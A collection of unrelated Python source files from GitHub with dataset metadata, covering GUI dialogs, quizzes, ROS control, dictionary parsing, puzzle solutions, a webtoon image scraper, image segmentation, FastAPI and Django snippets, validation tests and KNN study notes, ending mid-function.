def onCancel(self, event):\n self.window.destroy()\n\n def onOk(self, event):\n #need to get these before everything is destroyed\n self.subject = getComboBoxText(self.builder.get_object('cbSubject'))\n self.desc = self.builder.get_object('txDesc').get_text()\n\n if not len(self.getDescription().strip()):\n errorDialog('There must be a problem description')\n return True\n elif self.getSubject() is None:\n errorDialog('Must have a subject selected')\n return True\n else:\n self.ok = True\n self.window.destroy()\n\n #--------------------------------------------------------------------------\n # Functions designed for external use\n\n def isOk(self):\n ''' Did the user press Ok? '''\n return self.ok\n\n def getSubject(self):\n return self.subject\n\n def getDescription(self):\n return self.desc\n","repo_name":"dephraser/edcascaders","sub_path":"client/cascaders/askdialog.py","file_name":"askdialog.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16217096282","text":"import sys\r\nimport random\r\nif len(sys.argv)< 2:\r\n print(\"please supply flash card files.\")\r\n exit(1)\r\nprint(sys.argv[0])\r\nf_c=sys.argv[1]\r\nf=open(f_c,\"r\")\r\nQnA={}\r\n\r\nfor i in f:\r\n QA=i.strip().split(':')\r\n QnA[QA[0]]=QA[1]\r\nf.close()\r\n\r\nprint(\"Welcome to Sabse Bada Foodie\")\r\nprint(\"Press Q to quit\")\r\nprint(\"\")\r\nStates=list(QnA.keys())\r\nwhile True:\r\n state=random.choice(States)\r\n Delicacy=QnA[state]\r\n Ans=str(input(\"Whats popular dish of \"+state +\"?\")).lower()\r\n if Ans =='q':\r\n print(\"Thanks for participating Good bye!\")\r\n break\r\n elif str(Ans).lower()==str(Delicacy).lower():\r\n print(\"You are Correct foody\")\r\n else:\r\n print(\"Wrong answer, popular food of \"+state+\" is \" + Delicacy)\r\n\r\n\r\n\r\n\r\n","repo_name":"Shafin-Thiyam/Python_prac","sub_path":"flash_card.py","file_name":"flash_card.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33716713748","text":"#!/usr/bin/env python\nimport roslib\nimport io\nroslib.load_manifest('manual_robot_control')\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\ndef callback(joy):\n msg = Twist()\n msg.linear.x = joy.axes[1]\n msg.angular.z = joy.axes[0]\n pub.publish(msg)\n\n\ndef main():\n \n rospy.init_node('manual_joy_cmd_vel')\n rospy.Subscriber('/IRIS/joy_filtered', Joy, callback)\n global pub\n pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n\n rospy.spin()\n\n\nif __name__== \"__main__\":\n main()\n","repo_name":"IllinoisRoboticsInSpace/IRIS_V_control","sub_path":"manual_robot_control/scripts/xbox_control.py","file_name":"xbox_control.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27362793794","text":"#! python3\n\n# This file is a modified version of Github user hermanschaaf's cedict parser\n# Github repository: https://github.com/hermanschaaf/cedict-parser\n# Original license:\n# \"THE BEER-WARE LICENSE\" (Revision 42):\n# wrote this package. As long as you retain this notice you\n# can do whatever you want with this stuff. If we meet some day, and you think\n# this stuff is worth it, you can buy me a beer in return Herman Schaaf\n\nimport codecs\nimport json\nimport re\nimport os\n\nfrom pinyin_parser import number_to_tone_mark\n\n\ndef parse_cedict(infile_path, outfile_path):\n\t\"\"\"Takes a path to a Cedict U8 file and a path for the output file.\n\tReads the U8 file and writes a JSON file with a list with\n\tall Cedict definitions in the U8 file.\n\t\"\"\"\n\n\tprint('Parsing Cedict...')\n\n\tf = codecs.open(infile_path, 'r', 'utf8')\n\n\tc = 0\n\n\tnew_words = []\n\tfor line in f:\n\t\tif line.startswith('#'):\n\t\t\tcontinue\n\t\ttrad, simp = line.split(' ')[:2]\n\t\tpinyin = line[line.find('[')+1:line.find(']')]\n\t\teng = line[line.find('/') + 1:line.rfind('/')]\n\t\t\n\t\t# Convert pinyin in the english definitions from using\n\t\t# tone numbers to tone marks\n\t\ttry:\n\t\t\teng = re.sub(\n\t\t\t\t\tr'\\[[1-5a-zA-Z\\s,:·]+\\]',\n\t\t\t\t\tlambda x:\n\t\t\t\t\t\t'[' + number_to_tone_mark(\n\t\t\t\t\t\t\tx.group()[1:-1], umlauted_u='u:'\n\t\t\t\t\t\t) + ']',\n\t\t\t\t\teng\n\t\t\t\t\t)\n\t\texcept:\n\t\t\t# print('Except:', simp,\n\t\t\t# line[line.find('/') + 1:line.rfind('/')])\n\t\t\tpass\n\n\t\tword = {'s': simp,\n\t\t\t\t't': trad,\n\t\t\t\t'e': eng,\n\t\t\t\t'p': number_to_tone_mark(pinyin)\n\t\t\t\t}\n\n\t\tnew_words.append(word)\n\n\tf.close()\n\n\tos.makedirs(os.path.dirname(os.path.abspath(outfile_path)), exist_ok=True)\n\twith open(outfile_path, 'w', encoding='utf8') as outfile:\n\t\tjson.dump(new_words, outfile, indent=4, ensure_ascii=False)\n\n\tprint('Created cedict.json file with %d words.' % len(new_words))\n\tprint()\n\n\nif __name__ == '__main__':\n\n\tparse_cedict(os.path.join('data', 'src', 'cedict_ts.u8'), os.path.join('data', 'cedict.json'))\n","repo_name":"hernanqs/chinese-hqs","sub_path":"python/cedict_parser.py","file_name":"cedict_parser.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26893690077","text":"n = int(input())\nfor i in range(n):\n pav = input() ## armazena a palavra em pav\n num1 = pav[2:4] ## como os numeros são alocados no mesmo indice sempre, então é so usar a repartição de string nas devidas posicoes da palavra, a primeira ocorre no indice: 2,3\n num2 = pav[5:8] ## ja o segundo numero, ocorre no indice: 5 a 7, lembrando que o ultimo sempre tem que adicionar +1 da posição desejada.\n num3 = pav[11:13] ## ja o terceiro e ultimo numero ocorre no indice: 11 e 12\n num1 = int(num1) ## depois que armazena os numeros, basta tranformar cada um pra inteiro e printar no final\n num2 = int(num2)\n num3 = int(num3)\n print(num1 + num2 + num3)\n","repo_name":"Ralvesbraga/Linguagem-de-Programacao-Python","sub_path":"Lista6/2694_problema_com_calculadora.py","file_name":"2694_problema_com_calculadora.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21523188531","text":"from math import gcd\nfrom math import atan2\n\nclass Point:\n def __init__(self, x, y, norm, distance):\n self.x = x\n self.y = y\n self.norm = norm\n self.distance = distance\n self.angle = atan2(norm[0], norm[1])\n\ninp = []\nwith open(\"input.txt\", \"r\") as inputFile:\n inp = [[x for x in y.strip()] for y in inputFile.readlines()]\nasteroids = set()\nfor i in range(len(inp)):\n for j in range(len(inp[i])):\n if inp[i][j] == '#':\n asteroids.add((j, i))\n\n\nans1 = 0\nchosenPoint = (0, 0)\nsees = {}\nfor x1, y1 in asteroids:\n seen = {}\n for x2, y2 in asteroids:\n if (x1, y1) == (x2, y2):\n continue\n dx, dy = x2 - x1, y2 - y1\n norm = dx/gcd(dx, dy), dy/gcd(dx, dy)\n dist = dx**2 + dy**2\n p = Point(x2, y2, norm, dist)\n if norm in seen:\n if seen[norm].distance > p.distance:\n seen[norm] = p\n else:\n seen[norm] = p\n\n point = (x1, y1)\n sees[point] = seen.values()\n if len(sees[point]) > ans1:\n ans1 = len(sees[point])\n chosenPoint = point\n\n\nans2Point = sorted(sees[chosenPoint], key = lambda k: (k.angle, -1*k.distance), reverse = True)[199]\n\n\nprint(f\"answer for partOne: {ans1}\")\nprint(f\"answer for partTwo: {ans2Point.x * 100 + ans2Point.y}\")\n\n\n\n\n\n\n","repo_name":"strogera/AoC2019","sub_path":"Day10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12315899573","text":"import os\nimport urllib.request\nfrom bs4 import BeautifulSoup\n\n# 오프너 객체를 생성해 헤더를 추가\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\nurllib.request.install_opener(opener)\n\n# 웹툰 폴더 생성 및 이동\nos.mkdir(\"청춘 블라썸\")\nos.chdir(\"청춘 블라썸\")\n\n# 웹툰 회차 목록 페이지 크롤링\nweb = urllib.request.urlopen('https://comic.naver.com/webtoon/list?titleId=746834&page=3')\nsoup = BeautifulSoup(web, 'html.parser')\ntmp = soup.findAll('td', {\"class\":\"title\"})\n\nfor p in tmp:\n # 회차 제목에 있는 ':' 제거\n string = p.find(\"a\").text\n string = string.replace(':', \"\")\n\n # 회차 별 폴더 생성 및 이동\n os.mkdir(string)\n os.chdir(string)\n\n # 회차 별 페이지 크롤링\n web2 = urllib.request.urlopen('https://comic.naver.com' + p.find(\"a\")['href'])\n soup2 = BeautifulSoup(web2, 'html.parser')\n tmp2 = soup2.find('div', {\"class\": \"wt_viewer\"})\n\n # 회차 별 이미지 저장\n index = 1\n for img in tmp2.findAll('img'):\n urllib.request.urlretrieve(img['src'], str(index)+\".jpg\")\n index += 1\n\n # 이전 폴더로 이동\n os.chdir(\"..\")\n","repo_name":"NaYoung-kr/SWING_Python_Study","sub_path":"image_crawling/image_crawling.py","file_name":"image_crawling.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22008623340","text":"from django.db.models import Q \nfrom music.models import Music\n\ndef Search(reqeust):\n '''Search function view'''\n search_query = ''\n\n if reqeust.GET.get('query'):\n search_query = reqeust.GET.get('query')\n \n only_published_music = Music.objects.filter(published=True)\n\n music = only_published_music.distinct().filter(\n Q(title__icontains=search_query)\n )\n\n return music","repo_name":"AnonC0DER/NovaMusic-a-django-music-website","sub_path":"NovaMusic/music/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5088786861","text":"import sys, csv\nimport math\nimport time\nimport warnings\nimport numpy as np\nfrom tifffile import imwrite\nfrom tifffile import TiffFile\nfrom matplotlib import pyplot as plt\nfrom skimage import color, data, restoration, exposure, io\nfrom skimage.morphology import disk, reconstruction\nfrom skimage.filters import threshold_otsu, rank\nfrom skimage.util import img_as_ubyte\nfrom skimage.measure import label, regionprops\n\ndef trans(img):\n tSave = np.transpose(img,(2,1,0))\n tSave = np.rot90(tSave,3,axes=(1,2))\n tSave = np.flip(tSave,2)\n return tSave\n\n# Structure of function call: python 2P_VE.py \n\"\"\"2P_VE.py - Extracts the vessels from the thresholded scan\n using connected components analysis\"\"\"\n\nplt.rcParams['figure.figsize'] = [10, 10]\nplt.rcParams.update({'font.size': 12})\n\nwarnings.filterwarnings('ignore', '.*rank.*') # Ignores warnings in Otsu thresh about bit depth\n\nfilename = sys.argv[1]\n\n# Read in file\ntif = TiffFile(filename)\nthreshStack = tif.asarray()\n\n[imSlices, imHeight, imWidth] = threshStack.shape\n\n# Parameter importation also likely unnecessary for vessel extraction\n\n# Remove any excessive labels -= How to make more efficient\n# And how to use the Area masks for branching\naMasks = np.empty((imHeight, imWidth))\neMasks = np.empty((imHeight, imWidth))\ncMasks = np.empty((imHeight, imWidth))\nfor image in threshStack:\n labelImg = label(image)\n regions = regionprops(labelImg)\n aIndices = []\n areas = []\n eccIndices = []\n eccs = []\n circIndices = []\n circs = []\n aMask = np.zeros((imHeight, imWidth))\n eMask = np.zeros((imHeight, imWidth))\n cMask = np.zeros((imHeight, imWidth))\n for num, x in enumerate(regions):\n area = x.area_filled # What if you did convex area, or feret_diameter_max\n perimeter = x.perimeter\n ecc = x.eccentricity\n if(perimeter > 0):\n circ = (4*math.pi*area)/(perimeter**2)\n else:\n circ = 10000\n \n if (area > 100) and (area < 500):# and (ecc < 0.78) and (circ > 0.25):\n aIndices.append(num)\n \n if (ecc < 0.8):\n eccIndices.append(num)\n areas.append(area)\n #eccs.append(ecc)\n if (circ > 0.15) and (circ < 1):\n circIndices.append(num)\n #circs.append(circ)\n for index in aIndices:\n aMask += (labelImg==index+1).astype(int)\n for index in eccIndices:\n eMask += (labelImg==index+1).astype(int)\n for index in circIndices:\n cMask += (labelImg==index+1).astype(int)\n # Fill in mask w/ skimage.reconstruction - erosion\n seed = np.copy(aMask)\n seed[1:-1,1:-1] = 1\n aMask = reconstruction(seed, aMask, method = 'erosion')\n seed = np.copy(eMask)\n seed[1:-1,1:-1] = 1\n eMask = reconstruction(seed, eMask, method = 'erosion')\n seed = np.copy(aMask)\n seed[1:-1,1:-1] = 1\n cMask = reconstruction(seed, cMask, method = 'erosion')\n aMasks = np.dstack((aMasks, aMask))\n eMasks = np.dstack((eMasks, eMask))\n cMasks = np.dstack((cMasks, cMask))\n\naMasks = aMasks[:,:,1:imSlices+1]\neMasks = eMasks[:,:,1:imSlices+1]\ncMasks = cMasks[:,:,1:imSlices+1]\n\n## NOW TACKLE THESE MASKS SIDEWAYS TO GET SOME MORE CONNECTED COMPONENTS - start w/ emask\n## Takes 68.5 seconds for a 510x201x510 scan\n\nvMasks = np.empty((imHeight, imSlices))\nfor scan in cMasks:\n scan = np.array(scan)\n exScan = np.zeros_like(scan)\n for rid, row in enumerate(scan):\n pidx = np.where(row==1)[0]\n for pid in pidx:\n sect = np.array(scan[rid,pid:pid+15])\n idx = np.where(sect == 1)[0]\n ext = idx[idx.size-1]\n exScan[rid,pid:pid+ext] = 1\n vMasks = np.dstack((vMasks,exScan))\n\nvMasks = vMasks[:,:,1:imWidth+1]\nvMasks = np.transpose(vMasks,(0,2,1))\n\n# Connected component issue, might be dependent on depth of scan\n## Another connected component analysis, 3D, to isolate and remove the smaller regions to try to reduce error\nlv = label(vMasks)\nregions = regionprops(lv)\nfullMask = np.empty((imHeight,imWidth,imSlices))\nvidx = []\nareas = []\nminVol = (imHeight*imWidth*imSlices)/6535 # Experimentally concluded, I'm not sure how else to determine the volume percentage\nfor num, x in enumerate(regions):\n area = x.area\n if (area > minVol): #Calculate approximate volume based on image dimensions\n vidx.append(num)\n areas.append(area)\n\nfor index in vidx:\n fullMask += (lv==index+1).astype(int)\n\n# Special transformation for saving the full mask\nfullMask = np.transpose(fullMask, (2,0,1))\nfullMask = np.rot90(fullMask, 1, axes=(1,2))\nfullMask = np.flip(fullMask,1)\n\n# Saving process to have same orientation in ImageJ and display, might be unnecessary?\naMasks = trans(aMasks)\neMasks = trans(eMasks)\ncMasks = trans(cMasks)\naSave = aMasks.astype('float32')\neSave = eMasks.astype('float32')\ncSave = cMasks.astype('float32')\nfullSave = fullMask.astype('float32')\nareaOFN = filename[0:filename.find('_OT.tif')] + '_AREA_Mask.tif'\neccOFN = filename[0:filename.find('_OT.tif')] + '_ECC_Mask.tif'\ncircOFN = filename[0:filename.find('_OT.tif')] + '_CIRC_Mask.tif'\nvesselOFN = filename[0:filename.find('_OT.tif')] + '_VESSEL_Mask.tif'\nimwrite(areaOFN, aSave, photometric='minisblack')\nimwrite(eccOFN, eSave, photometric='minisblack')\nimwrite(circOFN, cSave, photometric='minisblack')\nimwrite(vesselOFN, fullSave, photometric='minisblack')","repo_name":"CollinPretzel/2P_Processing","sub_path":"2P_VE.py","file_name":"2P_VE.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29444431469","text":"import collections\n\nimport pytest\n\n\ndef compute(signature, n):\n \"\"\"Write the len(signature) nbonci and return first n elements.\"\"\"\n n_bonaci = len(signature)\n\n if n < n_bonaci:\n return signature[:n]\n\n deq = collections.deque(signature, maxlen=n_bonaci)\n res = signature\n while len(res) < n:\n s = sum(deq)\n res.append(s)\n deq.append(s)\n return res\n\n\n# put arguments and expected results here\nARGS_RESULTS = [\n (([0, 1], 10), [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]),\n (([1, 1], 10), [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]),\n (([0, 0, 0, 0, 1], 10), [0, 0, 0, 0, 1, 1, 2, 4, 8, 16]),\n (([1, 0, 0, 0, 0, 0, 1], 10), [1, 0, 0, 0, 0, 0, 1, 2, 3, 6]),\n (([1, 0, 0, 0, 0, 0, 0, 0, 0, 0], 20), [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 2, 4, 8, 16, 32, 64, 128, 256])\n]\n\n\n@pytest.mark.parametrize(\n ('input_args', 'expected'),\n ARGS_RESULTS,\n)\ndef test(input_args, expected) -> None:\n assert compute(*input_args) == expected\n\n\ndef main() -> int:\n for args, result in ARGS_RESULTS:\n print(compute(*args))\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"JakubDotPy/codewars","sub_path":"katas/fib_trib_friends.py","file_name":"fib_trib_friends.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23291398163","text":"\"\"\"\n.. _ref_sector_model:\n\nCyclic Model Visualization\n~~~~~~~~~~~~~~~~~~~~~~~~~~\nVisualize and animate a full cyclic model. This model is based on the\njetcat rotor.\n\nFirst, load the rotor. Notice how printing the rotor class reveals\nthe details of the rotor result file.\n\"\"\"\n# sphinx_gallery_thumbnail_number = 2\nfrom ansys.mapdl.reader import examples\n\nrotor = examples.download_sector_modal()\nprint(rotor)\n\n###############################################################################\n# Plot the rotor and rotor sectors\n#\n# Note that additional keyword arguments can be passed to the plotting\n# functions of ``pymapdl-reader``. See ``help(pyvista.plot`` for the\n# documentation on all the keyword arguments.\nrotor.plot_sectors(cpos=\"xy\", smooth_shading=True)\nrotor.plot()\n\n\n###############################################################################\n# Plot nodal displacement for result 21.\n#\n# Note that pymapdl-reader uses 0 based cumulative indexing. You could also\n# use the (load step, sub step) ``(4, 3)``.\nrotor.plot_nodal_displacement(\n 20, show_displacement=True, displacement_factor=0.001, overlay_wireframe=True\n) # same as (2, 4)\n\n\n###############################################################################\n# Animate Mode 21\n# ~~~~~~~~~~~~~~~\n# Disable movie_filename and increase n_frames for a smoother plot\nrotor.animate_nodal_solution(\n 20,\n loop=False,\n movie_filename=\"rotor_mode.gif\",\n background=\"w\",\n displacement_factor=0.001,\n add_text=False,\n n_frames=30,\n)\n","repo_name":"ansys/pymapdl-reader","sub_path":"examples/01-cyclic_results/sector_model.py","file_name":"sector_model.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"41774420445","text":"\"\"\"\n - PUT: to update an item you can use this\n - PATCH: to partially update data\n - If you want to receive partial updates, it's very useful to use the parameter exclude_unset in\n Pydantic's model's .dict().\n - Like item.dict(exclude_unset=True). That would generate a dict with only the data that was set when creating\n the item model, excluding default values.\n - Using Pydantic's update parameter. Now, you can create a copy of the existing model using .copy(), and pass the\n update parameter with a dict containing the data to update.\n - https://fastapi.tiangolo.com/tutorial/body-updates/\n\"\"\"\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\n\nclass Item(BaseModel):\n name: str | None = None\n description: str | None = None\n price: float | None = None\n tax: float = 10.5\n tags: list[str] = []\n\n\nitems = {\n \"foo\": {\"name\": \"Foo\", \"price\": 50.2},\n \"bar\": {\"name\": \"Bar\", \"description\": \"The bartenders\", \"price\": 62, \"tax\": 20.2},\n \"baz\": {\"name\": \"Baz\", \"description\": None, \"price\": 50.2, \"tax\": 10.5, \"tags\": []},\n}\n\n\n@app.get(\"/items/{item_id}\", response_model=Item)\nasync def read_item(item_id: str):\n return items[item_id]\n\n\n@app.put(\"/items/{item_id}\", response_model=Item)\nasync def update_item(item_id: str, item: Item):\n stored_item_data = items[item_id]\n stored_item_model = Item(**stored_item_data)\n update_data = item.dict(exclude_unset=True)\n updated_item = stored_item_model.copy(update=update_data)\n items[item_id] = jsonable_encoder(updated_item)\n return updated_item\n\nif __name__ == \"__main__\":\n uvicorn.run(\"__main__:app\", host=\"0.0.0.0\", port=8000, reload=True)\n","repo_name":"boringbyte/learn-fastapi","sub_path":"app/a_22_body_updates.py","file_name":"a_22_body_updates.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27885592771","text":"from tests.unit.dataactcore.factories.staging import FABSFactory\nfrom tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n\n_FILE = 'fabsreq9'\n\n\ndef test_column_headers(database):\n expected_subset = {'row_number', 'awardee_or_recipient_legal', 'correction_delete_indicatr',\n 'uniqueid_AssistanceTransactionUniqueKey'}\n actual = set(query_columns(_FILE, database))\n assert expected_subset == actual\n\n\ndef test_success(database):\n \"\"\" Test AwardeeOrRecipientLegalEntityName is required for all submissions except delete records. \"\"\"\n\n fabs = FABSFactory(correction_delete_indicatr='C', awardee_or_recipient_legal='REDACTED')\n fabs_2 = FABSFactory(correction_delete_indicatr='', awardee_or_recipient_legal='Name')\n\n # Test ignoring for D records\n fabs_3 = FABSFactory(correction_delete_indicatr='d', awardee_or_recipient_legal=None)\n fabs_4 = FABSFactory(correction_delete_indicatr='D', awardee_or_recipient_legal='')\n fabs_5 = FABSFactory(correction_delete_indicatr='d', awardee_or_recipient_legal='Name')\n\n errors = number_of_errors(_FILE, database, models=[fabs, fabs_2, fabs_3, fabs_4, fabs_5])\n assert errors == 0\n\n\ndef test_failure(database):\n \"\"\" Test fail AwardeeOrRecipientLegalEntityName is required for all submissions except delete records. \"\"\"\n\n fabs = FABSFactory(correction_delete_indicatr='c', awardee_or_recipient_legal=None)\n fabs_2 = FABSFactory(correction_delete_indicatr=None, awardee_or_recipient_legal='')\n\n errors = number_of_errors(_FILE, database, models=[fabs, fabs_2])\n assert errors == 2\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"tests/unit/dataactvalidator/test_fabsreq9.py","file_name":"test_fabsreq9.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"590539279","text":"#Cluster analysis is a technique or method for combining data points into groups or clusters based\n# on the numeric properties of the data points or the groups/clusters\n# \n# Clustering or Cluster analysis is one of the main data-driven methods for creating new knowledge\n# from data\n# \n# The concept of \"cluster\" is not defined\n# \n# Clusters are consequently defined by the algorithm that assigns a data point to a particular\n# cluster or creates a clusters from a collection of data points.\n# \n# CA is unsupervised learning\n# Withiin machine learning and artificial intelligence, CA is one of the main methods to make\n# Machines \"self-orgainze\", \"self-solve\" or \"create new knowledge\" from data\n# Within Data Science, Cluster Analysis is considered an explorative data analysis method\n# \n# Most cluster analysis algorithms are iterative algorithms\n# \n# Cluster Analysis solutions depend on the model, the data, data structures, administrative rules,\n# or the subjective will of the operator\n# \n# CA may be automated\n# \n# Algoritms may use \"rules of thumb\", \"trial and failure\", or \"requirements\" for particular desired \n# properties.\n# \n# Cluster analysts be they human or machines, may have or not have prior opinions on cluster\n# structures or what clusters should be found\n# \n# These prior opinions may or may not be included in a CA\n# \n# Achieved results from a cluster analysis may sometimes be hard to explain w/o any subject \n# matter knowledge or need to be speculative - this is why cluster analysis is regarded as \n# explorative.\n# \n# Ca has a large number of applications. \n# \n# In CA the objective is not to predict a target class variable or to classify a data point\n# to a class (classification)\n# Neither ios the objective to predict values for a variable y(prediction)\n# CA finds existing groupings or structures in the data as well as algorithmically defined\n# clusters among the data points.\n# Ca can be used to create new classes for algorithms to classify new data. Similarly, new or\n# through cluster analysis defined cluster membership labels may be used to predict future\n# data values.#\n\n\n#K-NEXT NEIGHBOUR CLASSIFIER\n# K-NN Classifier computes class membership for data points\n# \n# K-NN Classifier is not a cluster analysis algorithm but we'll take a look at this classifier\n# as the method is simple and easy to use to understand clusters and classes\n# \n# K-NN Classifier is an old and well-known algorithm that intuitively or \"artificially intelligently\"\n# classifies or places data points into classes or clusters based on the data points' closeness\n# and similarity to data points having a known class or cluster membership\n# \n# The K in the algorithm is the number if closest neighbouring data points to the measured\n# data points to the measured data point according to a distance measure.\n# -K could be 1: the closest known data point determines class or the cluster membership\n# for the tested data point.\n# -K could be 2: the two closest known data point determines class or the cluster membership\n# for the tested data point.\n# -K could be 5: the five closest known data point determines class or the cluster membership\n# for the tested data point.\n# -K could be N, any number, and the N closest known data point determines class or cluster\n# membership for the tested data point#\n\n#The K is dependent on distance measurement and also class/cluster dependent\n# -this means that the K must be selected with consideration for distance measurements\n# and the number of classes\n# -for example 3 classes and a K of 3 may create soem confusion in some datasets if the \n# distance measurement is the lowest average distance and the three closest data points\n# belong to different classes with the same distance from the considered data point#\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\niris = datasets.load_iris()\nDataF = pd.DataFrame(data=iris.data, columns=iris.feature_names)\nDataF[\"Species\"] = iris.target\nprint(DataF.head(5))\n\nsns.set_style(\"whitegrid\")\nPairplot_graph = sns.pairplot(DataF, kind=\"scatter\", hue=\"Species\", palette = \"bright\")\nplt.show()\n\n#This shwo how the classifier works using the methodology with the \"train_test_split\" method\n#We start by selecting the four data columns as data X and the class membership column as Y.\nX = DataF.iloc[:, :-1].values\nY = DataF.iloc[:, 4].values\nX_train, X_test,Y_train, Y_test = train_test_split(X, Y, test_size=0.40)\n\n#We create our Kay-Nearest_Neighbor classifier with Kay set to five to begin\nclassifier = KNeighborsClassifier(n_neighbors=5)\nclassifier.fit(X_train, Y_train)\nY_pred = classifier.predict(X_test)\n\n#We print the confusion matrixes and classification report to get a view on how well our Kay-naerest classifier works\nprint(confusion_matrix(Y_test, Y_pred))\nprint(classification_report(Y_test, Y_pred))\n\nX = DataF.iloc[:, :-1].values\nY = DataF.iloc[:, 4].values\nX_train, X_test,Y_train, Y_test = train_test_split(X, Y, test_size=0.40)\n\nAccuracy_data = pd.DataFrame(columns=['K', 'Trained_accuracy', 'Tested_accuracy'])\n\nfor k in range (1, 40):\n classifier = KNeighborsClassifier(n_neighbors=k)\n classifier.fit(X_train, Y_train)\n Y_pred = classifier.predict(X_test)\n Y_train_pred = classifier.predict(X_train)\n Tr_accuracy = accuracy_score(Y_train, Y_train_pred)\n Te_accuracy = accuracy_score(Y_test, Y_pred)\n accuracy_values = pd.DataFrame.from_dict({'K': [k], 'Trained_accuracy': [Tr_accuracy], 'Tested_accuracy': [Te_accuracy]})\n Accuracy_data = pd.concat([Accuracy_data, accuracy_values], ignore_index=True)\n \n print(Accuracy_data.head(5))\n \n fig, ax = plt.subplots()\n sns.lineplot(x='K', y='Trained_accuracy', data=Accuracy_data, ax=ax, color='red')\n ax2 = ax.twinx()\n sns.lineplot(x='K', y='Tested_accuracy', data=Accuracy_data, ax=ax2, color='blue')\n plt.show()\n\n","repo_name":"Ck178780/Training-Portfolio","sub_path":"ClusterAnalysis.py","file_name":"ClusterAnalysis.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31796147825","text":"import discord\nfrom discord.ext import commands\n\nclass Greetings(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self._last_member = None\n\n @commands.command(name='hello', aliases=['hi', 'yo'])\n async def hello(self, ctx, *, member: discord.Member = None):\n \"\"\"Says hello\"\"\"\n member = member or ctx.author\n if self._last_member is None or self._last_member.id != member.id:\n await ctx.send('Hello {0.name}~'.format(member))\n else:\n await ctx.send('Hello {0.name}... This feels familiar.'.format(member))\n self._last_member = member\n\n\ndef setup(bot):\n bot.add_cog(Greetings(bot))","repo_name":"eternityyxb/Discord-Bot","sub_path":"cogs/maincog.py","file_name":"maincog.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067048428","text":"def main():\r\n #input from the user(greeting)\r\n greet = input(\"Greeting: \")\r\n\r\n #prints the outcome and calls the start function\r\n print(f\"${value(greet)}\")\r\n\r\ndef value(greeting):\r\n #changed the lower and strip to be applied in the method because when a test is run, python\r\n greeting = greeting.lower().strip()\r\n if \"hello\" in greeting:\r\n return 0\r\n elif \"h\" in greeting[0]:\r\n return 20\r\n else:\r\n return 100\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Adamb0lt/CS50","sub_path":"CS50p/week5_unit_tests/test_bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5285681418","text":"from zad3testy import runtests\nfrom zad3EK import edmonds_karp\n\n# zakładam że odległość między p i q (liczona jako suma wag krawędzi najkrótszej ścieżki) jest nie mniejsza niż d,\n# najpierw usuwam krawędzie, które są dłuższe od D\n# potem tworząc super źródło oraz super ujśćie znajduje największy przepływ czyli ilość krawędzi o które jestem proszony\n# w poleceniu\n# O(VE²) ze względu na metode Edmondsa-Karpa\n#\n\ndef floyd_warshall(G):\n n = len(G)\n\n d = [[G[i][j] if G[i][j] > 0 else float('inf') for i in range(n)] for j in range(n)]\n\n for k in range(n):\n for i in range(n):\n for j in range(n):\n d[i][j] = min(d[i][j], d[i][k] + d[k][j])\n\n return d\n\ndef 